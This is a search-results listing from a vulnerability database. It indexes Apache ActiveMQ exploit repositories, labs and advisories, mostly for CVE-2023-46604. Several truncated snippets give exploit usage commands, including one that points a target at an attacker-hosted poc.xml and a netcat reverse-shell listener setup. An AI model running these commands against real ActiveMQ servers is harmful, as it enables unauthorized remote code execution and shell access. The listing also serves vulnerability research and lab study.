Lucene search
+L

980 matches found

Kitploit
Kitploit
added 2026/09/24 10:23 a.m.17 views

CVE-2023-46604-Apache-ActiveMQ-RCE-exp

项目参考 本项目是参考 https://github.com/X1r0z/ActiveMQ-RCE 项目的 exp 来重写的一个 python 版本的 exp 。 用法 root@kitploit: python attack.py -u 192.168.163.129 -x http://192.168.163.133:10001/poc.xml -p 61616 其中 -p 参数默认为 activeMQ 的默认端口。-x 参数注意需要加上协议的前缀。 介绍 这里附上 openwire 协议的图示就很明白了。 下面给出的是 Throwable 类型的数据包格式。...

10CVSS8AI score0.99891EPSS
SaveExploits33References1
Kitploit
Kitploit
added 2026/09/24 9:53 a.m.16 views

apache-activemq-rce-research

Apache ActiveMQ Classic — RCE 研究 针对 Apache ActiveMQ Classic 中 Jolokia → addNetworkConnector → xbean/Spring-XML 远程代码执行链(CVE-2026-34197 及其补丁绕过 CVE-2026-42588 )的私有研究存档,外加对已修复的 6.2.6 版本的全自动重审计,以及与 Crowdfense 公开的绕过文章进行的并列对比。 所有利用均在 本地实验室 Broker (Docker / 自托管)上执行。Payload 使用占位符攻击者主机。 目录...

8.5AI score0.00656EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/24 9:52 a.m.11 views

ActiveMQ_CVE-2015-5254

ActiveMQ反序列化(CVE-2015-5254) 漏洞描述:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message ServiceJMSObjectMessage对象利用该漏洞执行任意代码。 影响版本:Apache ActiveMQ 5.13.0之前的5.x版本 0x01 登陆后台确定版本: http://IP:8161 0x02 确定61616端口开放: nmap -sV -Pn -T4 -sC -p 61616 IP 0x03 发送反弹payload: java...

9.8CVSS7.8AI score0.38191EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/09/24 8:35 a.m.12 views

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

CVE-2023-46604 RCE 伪终端 该脚本利用 CVE-2023-46604(Apache ActiveMQ)生成一个伪终端。该漏洞源于 OpenWire 协议中的不安全反序列化,可实现远程代码执行。 描述 CVE-2023-46604 是 Apache ActiveMQ 的 OpenWire 协议中存在的一个反序列化漏洞。攻击者可利用该缺陷在运行 ActiveMQ 的服务器上执行任意代码。攻击者可以构造一个恶意 XML 文件,远程服务器将执行其中的命令。 此漏洞利用工具自动化并简化了 XML 文档的创建过程,提供基础服务器来传输文件,并通过 POST...

10CVSS8AI score0.99891EPSS
SaveExploits33
Kitploit
Kitploit
added 2026/09/24 4:24 a.m.7 views

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ 此漏洞利用建立在 https://github.com/X1cT34m https://github.com/X1r0z/ActiveMQ-RCE 的基础工作上。我们进一步开发了该技术,利用 Metasploit 框架 https://github.com/rapid7/metasploit-framework 实现了反弹 Shell。 用法: 重要提示:请手动将 XML 文件中的 IP 地址(第 11 行的 0.0.0.0)更改为生成 payload 时的 IP 地址。如果按照以下命令操作...

10CVSS8AI score0.99891EPSS
SaveExploits33References4
Kitploit
Kitploit
added 2026/09/24 3:55 a.m.11 views

CVE-2023-46604-RCE

CVE-2023-46604-RCE 漏洞 Apache ActiveMQ 中 OpenWire 传输协议的反序列化器存在一个反序列化漏洞。 受影响版本包括 5.18.0 至 5.18.2、5.17.0 至 5.17.5、5.16.0 至 5.16.6,以及 5.15.16 之前的所有版本。 设置 根据您的需求(您的命令)更改 POC.XML 中的值 托管 POC.XML 使用 -u 参数将 POC.XML 的 URL 传递给脚本,既可测试单个 IP,也可测试 IP 列表 使用方法: root@kitploit: options: -h, --help show this help...

10CVSS8AI score0.99891EPSS
SaveExploits33References1
Nuclei
Nuclei
added 2026/09/24 2:06 a.m.34 views

Apache ActiveMQ 6.x < 6.1.2 - Broken Access Control

Apache ActiveMQ 6.x contains an unauthenticated API web context caused by default configuration lacking security measures in the Jetty server, letting anyone interact with broker APIs and messaging layers, exploit requires no authentication. id: CVE-2024-32114 info: name: Apache ActiveMQ 6.x 6.1....

8.8CVSS7.8AI score0.07148EPSS
SaveExploits1References4
Kitploit
Kitploit
added 2026/09/24 12:43 a.m.6 views

CVE-2024-21683-RCE

CVE-2024-21683-RCE 致谢 https://x.com/realalphaman https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated 用法 root@kitploit: git clone https://github.com/W01fh4cker/CVE-2024-21683-RCE cd CVE-2024-21683-RCE pip install requests bs4 python CVE-2024-21683.py -u...

8.8CVSS7.9AI score0.88267EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/09/23 5:47 p.m.12 views

CVE-2016-3088

CVE-2016-3088 Apache ActiveMQ 远程代码执行利用 描述 Apache ActiveMQ 5.x 版本(5.14.0 之前)中的 Fileserver Web 应用程序允许远程攻击者通过 HTTP PUT 后跟 HTTP MOVE 请求来上传并执行任意文件。 作者 Alexandre Aguiar @cyberaguiar 利用分析 Apache ActiveMQ 远程代码执行漏洞分析 CVE-2016-3088 参考 https://nvd.nist.gov/vuln/detail/CVE-2016-3088 免责声明...

9.8CVSS8.4AI score0.98518EPSS
SaveExploits20
Kitploit
Kitploit
added 2026/09/23 4:08 p.m.6 views

CVE-2025-27533-Exploit-for-Apache-ActiveMQ

CVE-2025-27533-Exploit-for-Apache-ActiveMQ (PoC)漏洞利用程序,针对 CVE-2025-27533 ,Apache ActiveMQ 中的一个拒绝服务(DoS)漏洞。该工具发送恶意的 OpenWire 数据包,耗尽目标服务器的 JVM 堆内存, 并可能导致 ActiveMQ 服务在端口 61616 上崩溃。 使用 root@kitploit: python CVE-2025-27533Exploit.py --host --port 61616 --total-packets 2000 --buffer-sizes 0x1E00000...

7.5CVSS7.1AI score0.0866EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/23 3:18 p.m.9 views

CVE-2016-3088

Apache ActiveMQ PUT RCE 一键getshell usage:python3 CVE-2016-3088.py -u https://tartget.com/...

9.8CVSS8.2AI score0.98518EPSS
SaveExploits20
Kitploit
Kitploit
added 2026/09/23 1:35 p.m.10 views

CVE-2022-39197

CVE-2022-39197 RCE POC 使用方法 准备 Payload 1. 在 EvilJar/src/main/java/Exploit.java 中编辑第 19 行,填入你的 Payload 2. 使用 jar 构建:mvn clean compile assembly:single 3. 将 EvilJar/target/ 目录下的 EvilJar-1.0-jar-with-dependencies.jar 移动到 serve/ 文件夹 4. 编辑 serve\evil.svg,将 attacker 替换为你的地址 5. 使用 python3 -m http.server...

6.1CVSS7.7AI score0.46446EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/23 12:35 p.m.14 views

CVE-Lab

CVE-2023-46604 实验 本实验指导如何利用 CVE-2023-46604 漏洞。 致谢 Apache ActiveMQ CVE-2023-46604 环境 本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载: Kali Linux 2023.4 Ubuntu 22.04.3 LTS VMware-workstation-17.5.0 for windows VMware-workstation-17.5.0 for linux 模型与系统要求 在 Kali Linux 虚拟机上: 安装...

10CVSS7.9AI score0.99891EPSS
SaveExploits33References2
Kitploit
Kitploit
added 2026/09/23 9:06 a.m.12 views

CVE-2023-46604

CVE-2023-46604 该仓库包含针对影响 Apache ActiveMQ 的 CVE-2023-46604 漏洞的利用脚本和概念验证 PoC XML 文件。该漏洞由于 OpenWire 协议中的不安全反序列化实践,允许远程代码执行。 描述 CVE-2023-46604 是 Apache ActiveMQ 的 OpenWire 协议中存在的一个反序列化漏洞。攻击者可以利用此漏洞在运行 ActiveMQ 的服务器上执行任意代码。本仓库中的利用脚本自动化了向服务器发送精心构造的请求以触发该漏洞的过程。 仓库内容 exploit.py - 触发漏洞的主要 Python 利用脚本。...

10CVSS8AI score0.99891EPSS
SaveExploits33References1
Kitploit
Kitploit
added 2026/09/22 6:16 p.m.12 views

CVE-2023-46604-RCE

CVE-2023-46604-RCE Apache ActiveMQ 未经身份验证的远程代码执行的 Python 实现 设置与利用 nc -lvnp 4444 - 启动监听器 python3 -m http.server 8080 - 托管包含你 payload 的 poc.xml python3 CVE-2023-46604-RCE.py -i -p -u http://:8080/poc.xml - 启动利用...

10CVSS7.8AI score0.99891EPSS
SaveExploits33
RedHat Linux
RedHat Linux
added 2026/09/22 1:04 p.m.4 views

artemis-server: artemis-server: Pre-auth topology disclosure via CORE SUBSCRIBE_TOPOLOGY_V2 on channel0

A missing authentication vulnerability was found in Apache ActiveMQ Artemis. The SUBSCRIBETOPOLOGYV2 handler in CoreProtocolManager.LocalChannelHandler.handlePacket processes topology subscription requests on channel0 with zero authentication -- no call to getSecurityStore, no credential...

5.8AI score0.00804EPSS
SaveExploits0References4
RedHat Linux
RedHat Linux
added 2026/09/22 1:04 p.m.4 views

artemis-server: artemis-server: Pre-auth topology disclosure via CORE SUBSCRIBE_TOPOLOGY_V2 on channel0

A missing authentication vulnerability was found in Apache ActiveMQ Artemis. The SUBSCRIBETOPOLOGYV2 handler in CoreProtocolManager.LocalChannelHandler.handlePacket processes topology subscription requests on channel0 with zero authentication -- no call to getSecurityStore, no credential...

5.8AI score0.00804EPSS
SaveExploits0References4
RedHat Linux
RedHat Linux
added 2026/09/22 1:03 p.m.3 views

artemis-server: artemis-server: Pre-auth topology disclosure via CORE SUBSCRIBE_TOPOLOGY_V2 on channel0

A missing authentication vulnerability was found in Apache ActiveMQ Artemis. The SUBSCRIBETOPOLOGYV2 handler in CoreProtocolManager.LocalChannelHandler.handlePacket processes topology subscription requests on channel0 with zero authentication -- no call to getSecurityStore, no credential...

5.8AI score0.00804EPSS
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/22 12:12 p.m.14 views

activemq-ids-ips-lab

IDS/IPS 实验室 - 保护 Apache ActiveMQ 免受 RCE 攻击 本项目评估了 IDS 和 IPS 机制如何在受控实验室环境中检测和阻止 Apache ActiveMQ 漏洞 CVE-2023-46604 的利用。 项目概述 该实验室采用攻击者、网关和受害者系统相互分离的设计,以模拟真实的攻防流程。项目包括漏洞发现、手动验证、利用与缓解。 我的工作 构建并测试了实验室环境 使用 GVM 和 Nmap 对目标进行扫描 使用 Metasploit 模拟攻击 使用 Snort IDS/IPS 实现检测 使用 iptables 和 UFW 应用预防控制...

10CVSS7.8AI score0.99891EPSS
SaveExploits33
Kitploit
Kitploit
added 2026/09/22 11:58 a.m.14 views

CVE-2023-46604

CVE-2023-46604 作者: Ruben Fobe & Klaas Stessens 介绍 WARNING 本项目仅用于教育和实验目的。 仅在您拥有或有权测试的环境中使用这些技术。 本实验将模拟利用CVE-2023-46604,使用Kali Linux VM(攻击者)和Debian 11服务器VM(受害者)。 此实验仅在您的主机操作系统为Windows时有效! -- 如果您使用Linux,此实验将无法运行! 前提条件 Oracle VirtualBox VBoxmanage(已在PATH中) PowerShell SSH客户端 至少约30 GB可用磁盘空间 使用的软件 警告...

10CVSS7.9AI score0.99891EPSS
SaveExploits33
Rows per page
Query Builder